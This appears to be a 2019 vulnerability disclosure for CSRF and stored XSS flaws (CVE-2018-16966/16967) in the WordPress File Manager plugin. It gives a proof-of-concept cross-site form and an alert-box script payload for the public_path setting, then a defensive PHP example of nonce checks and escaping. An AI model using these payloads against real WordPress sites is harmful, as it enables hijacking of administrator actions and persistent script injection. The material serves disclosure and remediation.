Tuesday 2 April 2019

File Manager plugin for WordPress CVE-2018-16966 and CVE-2018-16967


Exploit Author : Mohammed Ansari S ( ansaert@gmail.com )
Discovered Date: September 11 2018
Affected Version: 3.0
Active installations: 200,000+


1# CSRF and stored XSS - CVE-2018-16966 and CVE-2018-16967
  1. Create an *.html file containing the following form:


<form method="POST" action="http://localhost/wordpress498/wp-admin/admin.php?page=wp_file_manager_root">
  <input type="text" name="public_path" value="typepayload"><br />
  <input type="text" name="submit" value="Save Changes"><br />
  <input type="submit">
</form>

Payload: "><script>alert(1);</script>

public_path=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E
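
For the defensive side, the sketch below shows the standard WordPress controls for these two bug classes on a settings page that accepts a public_path field: a nonce check against CSRF and context-aware escaping against stored XSS. It is an added example, not code from the File Manager plugin or from the original post; the plugin header, the option name example_public_path, the nonce action example_save_root, the nonce field example_nonce and the page slug example_root are all hypothetical.

```php
<?php
/*
 * Plugin Name: Example hardened settings page (illustrative only, not wp-file-manager code)
 */

// Hypothetical names throughout: example_root, example_save_root,
// example_nonce, example_public_path.
add_action( 'admin_menu', function () {
    add_menu_page( 'Example Root', 'Example Root', 'manage_options',
        'example_root', 'example_render_root_page' );
} );

function example_render_root_page() {
    // Authorisation: only administrators may view or change the setting.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }

    if ( isset( $_POST['submit'] ) ) {
        // CSRF defence: the request must carry a nonce issued to this user
        // for this action. A form hosted on another origin cannot supply it,
        // so check_admin_referer() stops the request before anything is saved.
        check_admin_referer( 'example_save_root', 'example_nonce' );

        // Input handling: remove slashes added by WordPress, then strip tags
        // and control characters before the value is stored.
        $path = isset( $_POST['public_path'] )
            ? sanitize_text_field( wp_unslash( $_POST['public_path'] ) )
            : '';
        update_option( 'example_public_path', $path );
    }

    $stored = get_option( 'example_public_path', '' );
    ?>
    <form method="POST" action="<?php echo esc_url( admin_url( 'admin.php?page=example_root' ) ); ?>">
        <?php wp_nonce_field( 'example_save_root', 'example_nonce' ); ?>
        <!-- Stored XSS defence: escape for the HTML attribute context on output,
             so a stored quote or angle bracket cannot close the value attribute. -->
        <input type="text" name="public_path" value="<?php echo esc_attr( $stored ); ?>"><br />
        <input type="submit" name="submit" value="Save Changes">
    </form>
    <?php
}
```

Escaping on output is what neutralises values already stored before the fix; sanitising on input alone would leave existing database entries exploitable.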
